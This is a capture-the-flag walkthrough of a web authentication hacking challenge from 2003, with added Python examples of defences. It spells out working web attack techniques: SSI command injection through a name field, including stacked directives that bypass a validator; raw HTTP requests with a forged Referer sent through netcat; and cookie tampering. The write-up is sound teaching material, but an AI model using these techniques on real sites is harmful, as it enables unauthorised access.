
www.hulla-balloo.com/hack
Web Authentication Challenge Walkthrough

Aug 8, 2003
Johnny Long

This document describes how to beat the hacking challenge found at
http://www.hulla-balloo.com/hack/.

I encourage you to try the challenge yourself, then refer to this document for
hints or spoilers. It’s more fun when you do it yourself. =)

j0hnny
http://johnny.ihackstuff.com
Johnny@ihackstuff.com

http://www.hulla-balloo.com/hack/level1/

“This level is only intended to weed out the total idiots. Enter the password and
you can advance to level 2.”

Hint: “Use the source, Luke.”


Spoiler:

The password is in the source:

The password for level 1 is ‘insanitypepper’.

Security considerations: Always read the source code. The visual representation of the
page is not what is important from a security standpoint. Comments, especially, can be
very telling.

http://www.hulla-balloo.com/hack/level2/index.php

“Network Security Sam set up a password protection script. He made it load the
real password from an unencrypted text file and compare it to the password the
user enters. However, he neglected to upload the password file...”

Hint:

Confucius say “Always test knob before declaring door locked.” (Or was that
Yoda?)

Spoiler:

The password authentication is broken and produces an error whenever a password is
entered:

Warning: Unable to access password.txt in /home/sites/site18/web/hack/level3/index.php on line 8

Warning: fopen("password.txt", "r") - No such file or directory in /home/sites/site18/web/hack/level3/index.php on line 8

However, if a blank password is entered, you are whisked right through to level 3.

Security Considerations: Sometimes authentication works, and sometimes it
doesn’t. Don’t assume a password field works just because it is there. Never trust that
authentication works properly. Sometimes it’s just plain broken.

http://www.hulla-balloo.com/hack/level3/index.php

“This time Network Security Sam remembered to upload the password file, but
there were deeper problems than that.”

Hint:
“Learn from past mistakes. Especially Sam’s.”

More hints:

This time, Sam uploaded that password file.

What do we know about that password file?

Remember level 2’s error message:

Warning: Unable to access password.txt in /home/sites/site18/web/hack/level3/index.php on line 8

We know that the password file is called password.txt in the /hack/level3 directory.

Spoiler:

Sam used the same naming conventions for this level as he did for the last level.
The password file is still named ‘password.txt’ but has been moved to the
‘/hack/level4’ directory. Unfortunately, the password file can be viewed
directly:

Figure 1: http://www.hulla-balloo.com/hack/level4/password.txt

The password is ‘bubbleboy’.

Security Considerations:

This example is not entirely based on reality. However, certain concepts are
interesting.

• error messages are always revealing, even when they seem out of context
• humans are creatures of habit
• look for trends across a site, and maximize on them

http://www.hulla-balloo.com/hack/level4/index.php

“This time Sam hardcoded the password into the script. However, the password
is long and complex, and Sam is often forgetful. So he wrote a script that would
email his password to him automatically in case he forgot.”

Hint:

Sam is forgetful, but you forgot the password too, right?

You have two options here. You could hack into hulla-balloo.com and steal
Sam’s email, or not send that email to hulla-balloo at all...

Spoiler:

Save the web page to your local machine and change this:

<form action="level4.php" method="post">
<input type="hidden" name="to" value="webmaster@hulla-balloo.com">
<input type="submit" value="Send password to Sam">

to this (inserting your email address instead of mine):

<form action="http://www.hulla-balloo.com/hack/level4/level4.php" method="post">
<input type="hidden" name="to" value="johnny@ihackstuff.com">
<input type="submit" value="Send password to Sam">

Load the local file in your browser and click “Send password to Sam.” The email will be
sent to you. The password is ‘rainbow’.

http://www.hulla-balloo.com/hack/level5/index.php

“Sam has gotten wise to all the people who wrote their own forms to get the
password. Rather than actually learn the password, he decided to make his email
program a little more secure.”

Hint: Do you have any references?

Spoiler:

Save the web page to your local machine and change this:

<form action="level5.php" method="post">
<input type="hidden" name="to" value="webmaster@hulla-balloo.com">
<input type="submit" value="Send password to Sam">

to this (inserting your email address instead of mine):

<form action="http://www.hulla-balloo.com/hack/level5/level5.php" method="post">
<input type="hidden" name="to" value="johnny@ihackstuff.com">
<input type="submit" value="Send password to Sam">

Load the local file in your browser and click “Send password to Sam.”
The password never arrives in your mailbox! Let’s investigate why...

Save the page locally. Change the values of this:

<form action="level5.php" method="post">

to this:

<form action="http://localhost/level5.php" method="post">

and change this:

<input type="hidden" name="to" value="webmaster@hulla-balloo.com">

to this (inserting your email address):

<input type="hidden" name="to" value="johnny@ihackstuff.com">

1. Run netcat to simulate a web server running on your local machine (localhost).
   Use the command line “nc -L -p80 -v”.
2. Click the “Send” button on your local page.
3. Netcat will show what would be sent to the hulla-balloo server when you click the
   “Send” button. Netcat will show something like this:

Now, if we copy these lines which were sent to the web server:

POST /hack/level5/level5.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: localhost
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache

to=johnny@ihackstuff.com

and paste them into “nc www.hulla-balloo.com 80” we get this:

The first few lines are diagnostic and can be ignored:

DNS fwd/rev mismatch: localhost != user-jxj0ar2v3y
connect to [127.0.0.1] from localhost [127.0.0.1] 3893

the next few lines are what was sent to the server:

POST /hack/level5/level5.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: localhost
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache

to=johnny@ihackstuff.com

the lines following this are what the server sent in response:

HTTP/1.1 200 OK
Date: Thu, 24 Jul 2003 19:39:12 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) Chili!Soft-ASP/3.6.2 mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
X-Powered-By: PHP/4.1.2
Keep-Alive: timeout=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

20
Invalid referring URL. Nice try!
0

The server didn’t like what we had to say! We need to send a valid “Referer” value.

Next modify what was sent to the server. Insert this line into the header:

Referer: http://www.hulla-balloo.com/hack/level5/index.php

This is now what is sent:

POST /hack/level5/level5.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer: http://www.hulla-balloo.com/hack/level5/index.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www.hulla-balloo.com
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache

to=johnny@ihackstuff.com

Fire up netcat with “nc www.hulla-balloo.com 80” and paste in the above text. You
may need to press enter a few times after pasting the text. It should look like this:

The password will be sent to the email address entered. The password is ‘smokehouse’.

Security Considerations: Never use a Referer value as a sole security measure. It can
be spoofed, even when used in combination with other methods.

http://www.hulla-balloo.com/hack/level6/index.php

“Network Security Sam has encrypted his password. The encryption system is publicly
available and can be accessed with this form: Please enter a string to have it
encrypted.”

Hint: It’s not really crypto. Play.

Spoiler:

The provided form gives you a place to test the encoding scheme.
Encrypting “aaaaaaaaa” (nine a’s) gives you “abcdefghi”.

Turning that into a basic algorithm, we get:

encoded_text[pos] = cleartext[pos] + (pos-1)

where pos = position of the character in the string (counting from 1)

So, if we add 0 (zero, position one minus one) to the ASCII decimal value of the first
character (a=97) in the plaintext, we get the same value:

97 + 0 = 97 (a)

Likewise, adding 1 (one, position two minus one) to the ASCII decimal value of the second
character (again a=97), we get 98:

97 + 1 = 98 (b)

Our whole encoding process looks like this:

start decimal   start ASCII   position - 1   end decimal   end ASCII
97              a             + 0            = 97          a
97              a             + 1            = 98          b
97              a             + 2            = 99          c
97              a             + 3            = 100         d
97              a             + 4            = 101         e
97              a             + 5            = 102         f
97              a             + 6            = 103         g
97              a             + 7            = 104         h
97              a             + 8            = 105         i

Result: ‘aaaaaaaaa’ encoded is ‘abcdefghi’

Now, to decrypt, we do the reverse:

encoded_text[pos] - (pos-1) = cleartext[pos]

where pos = position of the character in the string

We know the encoded text is:

ffnrr~

So, if we subtract 0 (zero, position one minus one) from the ASCII decimal value (102)
of the first character (f) in the encoded text, we get 102 (ASCII ‘f’):

102 – 0 = 102

likewise, subtracting 1 (one, position 2 minus one) from the ASCII decimal value (102)
of the second character (f) in the encoded text, we get 101 (ASCII ‘e’):

102 – 1 = 101

Our whole decoding process looks like this:

start ASCII   start char   position - 1   end ASCII   end char
102           f            - 0            = 102       f
102           f            - 1            = 101       e
110           n            - 2            = 108       l
114           r            - 3            = 111       o
114           r            - 4            = 110       n
126           ~            - 5            = 121       y

Result: ‘ffnrr~’ decoded is ‘felony’
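
As an added example that is not part of the original walkthrough, the position-shift scheme above written out in Python. It generalises the two tables to any string, and includes the chosen-plaintext step the text uses (feeding a run of identical characters through the form) to read the shift pattern straight off the output:

```python
# Added example, not from the original walkthrough: the level 6 scheme as worked
# out above. Positions are counted from 1 in the text, so the shift for a
# character is (pos - 1), which is simply its zero-based index.


def encode(cleartext: str) -> str:
    """encoded_text[pos] = cleartext[pos] + (pos - 1)"""
    return "".join(chr(ord(ch) + i) for i, ch in enumerate(cleartext))


def decode(encoded: str) -> str:
    """encoded_text[pos] - (pos - 1) = cleartext[pos]"""
    return "".join(chr(ord(ch) - i) for i, ch in enumerate(encoded))


def decode_table(encoded: str) -> list:
    """Rows of (start ASCII, start char, shift, end ASCII, end char), i.e. the
    decoding table in the text, for any encoded string."""
    return [(ord(ch), ch, i, ord(ch) - i, chr(ord(ch) - i))
            for i, ch in enumerate(encoded)]


def recover_shifts(chosen_plaintext: str, observed: str) -> list:
    """The chosen-plaintext step from the text: submit a run of identical
    characters and read the per-position shift off the output. There is no
    key anywhere, which is why the hint says it is not really crypto."""
    return [ord(c) - ord(p) for p, c in zip(chosen_plaintext, observed)]


if __name__ == "__main__":
    for row in decode_table("ffnrr~"):          # constructed: the level 6 ciphertext
        print("%3d %s - %d = %3d %s" % row)
    print(decode("ffnrr~"))                     # felony
    print(recover_shifts("aaaaaaaaa", encode("aaaaaaaaa")))
```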


http://www.hulla-balloo.com/hack/level7/index.php

This challenge has been removed. The password is “breathe”.

http://www.hulla-balloo.com/hack/level8/index.php

“Sam remains confident that an obscured password file is still the best idea, but he
screwed up with the calendar program. Sam has saved the unencrypted password file
in /home/sites/site18/web/hack/level8/.

However, Sam's young daughter Stephanie has just learned to program in PHP. She's
talented for her age, but she knows nothing about security. She recently learned about
saving files, and she wrote a script to demonstrate her ability. Enter your name: ”

Hint: Don’t take the bait. Some challenges may feel like they should go a certain way,
but they won’t. Make the attempt, but if there’s no sign of budging, move on.

More hints:

Figure 2: Some obvious things...


Figure 3: ...just won't work.
Spoiler:

There are two screens to focus on. First, the php output:

Figure 4: php output


Figure 5: and then the .shtml output

The .shtml extension on Stephanie’s response file should be an indicator here.

What does the shtml extension mean? A good definition exists at
http://searchwebservices.techtarget.com/sDefinition/0,,sid26_gci214204,00.html:

“A Web file with the suffix of ".shtml" (rather than the usual ".htm") indicates a file
that includes some information that will be added "on the fly" by the server before
it is sent to you. A typical use is to include a "Last modified" date at the bottom of
the page.

This Hypertext Transfer Protocol facility is referred to as a server-side include.
(Although rarely done, the server administrator can identify some other file name
suffix than ".shtml" as a server-side include file.) You can think of a server-side
include as a limited form of common gateway interface application. In fact, the
CGI is not used. The server simply searches the server-side include file for CGI
environment variables, and inserts the variable information in the places in the
file where the "include" statements have been inserted.”

Further researching “server-side includes” or SSI’s, we discover (again from
www.whatis.com at http://whatis.techtarget.com/definition/0,,sid9_gci214225,00.html)
that:

“A server-side include is a variable value (for example, a file "Last modified" date)
that a server can include in an HTML file before it sends it to the requestor. If
you're creating a Web page, you can insert an include statement in the HTML file
that looks like this:

<!--#echo var="LAST_MODIFIED"-->

and the server will obtain the last-modified date for the file and insert it before the
HTML file is sent to requestors. “

Normally, there is no easy way to ‘inject’ SSI includes into a web server. However, we
can assume for a moment that Stephanie’s script may provide one way of doing this.
Enter <!--#echo var="LAST_MODIFIED"--> as a name in Stephanie’s script. The
following message is produced:

“If you are trying to use server side includes to solve the challenge, you are on
the right track: but I have limited the commands allowed to ones relevant towards
finding the password file for security reasons(because there will always be that
one person who decides to execute some rather nasty commands). So please
manipulate your code so that it is a little more pertaining to the level.”

This is not a “standard” message. Instead, the author of the web page has “dumbed
down” the use of SSI’s for practical reasons (most specifically protection of his web
server ;-) It is encouraging that SSI’s are ‘on the right track.’ A great document on SSI’s
exists here: http://hoohoo.ncsa.uiuc.edu/docs/tutorials/includes.html. Reading this
document, we discover that one powerful SSI include statement looks something like
this:

<!--#exec cmd="pwd" -->

This example executes a shell command, specifically “pwd” or “print working directory.”
This command also produces the ‘on the right track’ message.

Remembering that we are supposed to be looking for a “Secret” file, we can turn our
focus to the ‘ls’ command:

<!--#exec cmd="ls" -->

This command, when entered as the name, produces something like this:

Figure 6: <!--#exec cmd="ls" -->

Remember, though, that the password file is not in the tmp/ directory, but rather another
level up. The most obvious way to get there is with something like this:

<!--#exec cmd="ls ../" -->

This command produces something like this:

Figure 7: <!--#exec cmd="ls ../" -->


Nestled deep inside this output is our secret file name “au12ha39vc.txt” which, when
browsed, gives us the password:

Figure 8: The password

Security Considerations: Never allow unchecked user input into dynamic html.

http://www.hulla-balloo.com/hack/level9/index.php

“Network Security Sam is going down with the ship - he's determined to keep
obscuring the password file, no matter how many times people manage to
recover it. This time the file is saved in /home/sites/site18/web/hack/level9/.

In the last level, however, in my attempt to limit people to using server side
includes to display the directory listing to level 8 only, I have mistakenly screwed
up somewhere.. there is a way to get the obscured level 9 password. See if you
can figure out how...

This level seems a lot trickier than it actually is, and it helps to have an
understanding of how the script validates the user's input. The script finds the
first occurrence of '<--', and looks to see what follows directly after it. If it matches
"#exec cmd="ls"-->", "#exec cmd="ls /home/sites/site18/web/hack/level8/"-->" or
"#exec cmd="ls /home/sites/site18/web/hack/level8"-->", it accepts it. If it does
not match any of the situations above, then it kicks the user out.”

Hint: Lay out what, exactly, worked for the previous level. These are the keys to this
level. Provide the key to allow access to better, more relevant commands.

The accepted commands to input into level 8 are:

<!--#exec cmd="ls"-->
<!--#exec cmd="ls /home/sites/site18/web/hack/level8/"-->
<!--#exec cmd="ls /home/sites/site18/web/hack/level8"-->

What didn’t work:

At first, it seemed logical to use Unicode here. The logic goes something like this: if we
can slip some characters past the detector, perhaps we can get the detector to not
notice us. (A good reference for Unicode use on the web is here:
http://www.pemberley.com/janeinfo/latin1.html)

For starters, consider the following:

&#60!--#exec cmd="ls" -->

The “&#60” above is the HTML numeric character reference (decimal 60) for the less-than
symbol. When processed by the web server, this command looks like this:

<!--#exec cmd="ls" -->

Tested against the web server, here are the results:


Figure 9: Unicode attempt

Although the Unicode slipped past the detector, the shtml does not execute the
command as expected. Dead end. On to another idea: command stacking. Perhaps
more than one command can be stacked one on top of another. Some simple
examples:

<!--#exec cmd="ls" --><!--#exec cmd="ls ../"-->
<!--#exec cmd="ls" --><!--#exec cmd="ls /home/sites/site18/web/hack/level9"-->

Notice that in each example the detector would allow the first command in each “stack.”
Both of these commands, when entered into the “Enter your name” field in level 8
produce the following result:

Figure 10: Stacking Failure


Admittedly, this level is extremely sensitive to syntax. However, after much trial and
error, the accepted string becomes:

<!--#exec cmd="ls /home/sites/site18/web/hack/level8/"--><!--#exec cmd="ls /home/sites/site18/web/hack/level9/"-->

This string produces the following .shtml file:

Figure 11: Successful Stacking

By following the link to http://www.hulla-balloo.com/hack/level9/p9ie283zc3.txt, we
discover the level 10 password.
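
The check the challenge author describes above, modelled in Python next to a hardened version. This is an added example and not the challenge's own PHP; it assumes the validator looks for the literal "<!--" that the three accepted commands begin with. The flaw is that only the text after the first marker is examined, so the stacked string above passes, while a whole-value allow-list (or simply escaping the name before it is written into the .shtml file) does not let anything ride along:

```python
import html
import re

# Added example, not the challenge's own code. Models the level 8/9 check as the
# author describes it: only what follows the FIRST "<!--" is inspected. The
# accepted commands on the page begin with "<!--", so that literal is assumed.
ALLOWED = (
    '#exec cmd="ls"-->',
    '#exec cmd="ls /home/sites/site18/web/hack/level8/"-->',
    '#exec cmd="ls /home/sites/site18/web/hack/level8"-->',
)

# Any SSI directive; non-greedy so stacked directives are matched one at a time.
DIRECTIVE = re.compile(r"<!--#\w+.*?-->")


def first_directive_check(name: str) -> bool:
    """The flawed check: accept if the text after the first '<!--' is allow-listed.
    Anything appended after an accepted directive is never looked at."""
    start = name.find("<!--")
    if start == -1:
        return True  # an ordinary name, no directive at all
    rest = name[start + len("<!--"):]
    return any(rest.startswith(allowed) for allowed in ALLOWED)


def count_directives(name: str) -> int:
    """How many directives the .shtml processor would actually see."""
    return len(DIRECTIVE.findall(name))


def strict_check(name: str) -> bool:
    """Hardened allow-list: the entire value must equal one permitted directive,
    so nothing can be stacked after it."""
    if "<!--" not in name:
        return True
    return any(name == "<!--" + allowed for allowed in ALLOWED)


def render_safe(name: str) -> str:
    """The fix for 'unchecked user input into dynamic html': escape the value
    before it is written into the .shtml file, so no directive can parse at all."""
    return html.escape(name, quote=True)


# Constructed inputs mirroring the two attempts described in the text.
STACKED_WITH_SPACE = '<!--#exec cmd="ls" --><!--#exec cmd="ls ../"-->'
STACKED_EXACT = ('<!--#exec cmd="ls /home/sites/site18/web/hack/level8/"-->'
                 '<!--#exec cmd="ls /home/sites/site18/web/hack/level9/"-->')

if __name__ == "__main__":
    for sample in (STACKED_WITH_SPACE, STACKED_EXACT):
        print(first_directive_check(sample), strict_check(sample),
              count_directives(sample), render_safe(sample))
```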

http://www.hulla-balloo.com/hack/level10/index.php

“Network Security Sam has decided to hardcode the password into the script. He also
started to use cookies to detect if the user is authorized to advance to the next level.
When you enter the correct password, it sets you to authorized, and if you enter an
incorrect password, it sets you to unauthorized.”

Hint: Coookie. Coookie. Cooooooookie.

Spoiler:

Dropping in the password from the last level and sniffing the traffic, we discover that the
site is setting a cookie:

The cookie, “level11_authorized”, is set to “no”. The most obvious approach is to
set this value to “yes”.

The destination of the POST this time is “/hack/level11/index.php”.

The password will be the same as the previous level, “childhood”.

Using the techniques described earlier, this HTTP POST can be sent to the server:

POST /hack/level11/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: www.hulla-balloo.com
Cookie: level11_authorized=yes
Content-Length: 18
Connection: Keep-Alive
Cache-Control: no-cache

password=childhood

The response from the server looks like this:

Question: What’s wrong with this picture?

Notice the strange HTML in the server response... We missed something. In order to
gather more information, netcat is instructed to capture traffic in hex with the ‘-o
filename’ switch:

nc.exe www.hulla-balloo.com 80 -o level10.txt

After posting this request into netcat, viewing the level10.txt file reveals:

Figure 12: The cookie stuck. ‘level11_authorized’ is set to ‘yes’.

Figure 13: The password is revealed as ‘spiral’.
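
The level 10 authorization logic as described above, modelled in Python beside the minimal fix of binding the cookie value to a server-side secret with an HMAC. This is an added example, not from the walkthrough or the challenge's PHP; SECRET is a constructed placeholder, and the cookie name is the one the site sets:

```python
import hashlib
import hmac

# Added example, not from the walkthrough or the challenge's PHP. SECRET is a
# constructed placeholder; a real deployment generates a random secret and
# keeps it only on the server.
SECRET = b"constructed-placeholder-secret"


def parse_cookie_header(header: str) -> dict:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def naive_is_authorized(header: str) -> bool:
    """Level 10 as described: trust whatever the cookie text says, so a client
    that edits 'no' to 'yes' is authorized."""
    return parse_cookie_header(header).get("level11_authorized") == "yes"


def sign_value(value: str) -> str:
    """Produce 'value.mac' where mac = HMAC-SHA256(SECRET, value)."""
    mac = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def signed_is_authorized(header: str) -> bool:
    """Accept only a value whose MAC was produced with the server's secret.
    Editing the value in the browser invalidates the MAC; swapping the MAC
    from a 'no' cookie onto a 'yes' value fails for the same reason."""
    token = parse_cookie_header(header).get("level11_authorized", "")
    value, sep, mac = token.rpartition(".")
    if not sep:
        return False  # unsigned value, as in the original challenge
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected) and value == "yes"


if __name__ == "__main__":
    tampered = "level11_authorized=yes"                  # constructed
    print(naive_is_authorized(tampered), signed_is_authorized(tampered))
    print(signed_is_authorized("level11_authorized=" + sign_value("yes")))
```

A server-side session keyed by an opaque random id is the more usual design; the signed value is the smallest change that stops the edit-the-cookie approach.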


http://www.hulla-balloo.com/hack/level11/index.php
and
http://www.hulla-balloo.com/hack/level12/index.php

Sadly, the challenge starts to fall apart right around level 11. Levels 11 and 12 are really
the same as level 10.

Hint: Cooookie. Coookie. Coooookie.

Spoiler:

Change the appropriate URLs, and try again. Simply paste in the POST to netcat like
so:

POST /hack/level12/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: www.hulla-balloo.com
Cookie: level12_authorized=yes
Content-Length: 18
Connection: Keep-Alive
Cache-Control: no-cache

password=spiral

The result will look something like this:

The password for level 12 is ‘durchfall’.


Now the “hard part” is figuring out how to get your name and comments in the high
score listing. I forgot that the top score list
(http://www.hulla-balloo.com/hack/topscores.php) actually has a form at the bottom for
submitting high scores. The ending is very anti-climactic... sorry! =(

http://www.hulla-balloo.com/hack/level8/level8.php?fs=/hack/level8/index.php?password=CENSORED

Final Notes:

There are easier ways to skin a cat! Thanks go to Wolfman <Wolfman@deny.de> over at
http://wolfman.deny.de for HAS (Hephaestus's Ashen Spear). According to Wolfman:

“Hephaestus's Ashen Spear (HAS) is a tool to test weak CGI's on your
webserver. It's built around the use of templates to make it flexible
enough to use with most CGI's and PHP. It should be able to work with
any kind of webpage that requires POST or GET. If you're able to find a
weakness that allows you to make shell/pipe commands to the remote system,
then you can start taking advantage of the Visual *Nix filesystem
browser. This does not have all system commands, but there is a
commandline-like feature that will allow you to unleash your own
skills. HAS can even help out with uploading text-based files like CGI
and PHP scripts to the server. With HAS you can see how secure your
server's CGI's and file system rights really are.”

HAS really simplifies the process of going through this challenge. Here are Wolfman’s
comments on completing the challenge using HAS instead of Netcat:

Level 4

CGI with full path
http://www.hulla-balloo.com/hack/level4/level4.php

CGI params
to=wolfman@deny.de

Comment
Password script will allow GET as well as POST.
Submit button's value is not used/checked in the script, so it can be omitted.

So you could do this in your browser
http://www.hulla-balloo.com/hack/level4/level4.php?to=wolfman@deny.de

instead of saving the form and editing.

Level 5

CGI with full path
http://www.hulla-balloo.com/hack/level5/level5.php

CGI params
to=wolfman@deny.de
Getting Invalid referer

Go to Connection options
Custom refferer = http://www.hulla-balloo.com/hack/level5/index.php

Comment
A bit less hassle than using NetCat.
Once again the server will allow both GET and POST.

Level 10

CGI with full path
http://www.hulla-balloo.com/hack/level11/index.php

CGI params
password=childhood

Comment
A sniffer is the natural choice, but when it's just a cookie, HAS can be used
to see it.
Under Connection options, check "Show headers /Debug"; this will make another tab
visible that will show all headers sent to and from the server.
Here you can find Set-Cookie: level11_authorized=no

Under Connection options you can also set your own cookies.
Custom cookie = level11_authorized=yes

To read the server answer more easily, hit the Render HTM view button on the left side of
the server reply.
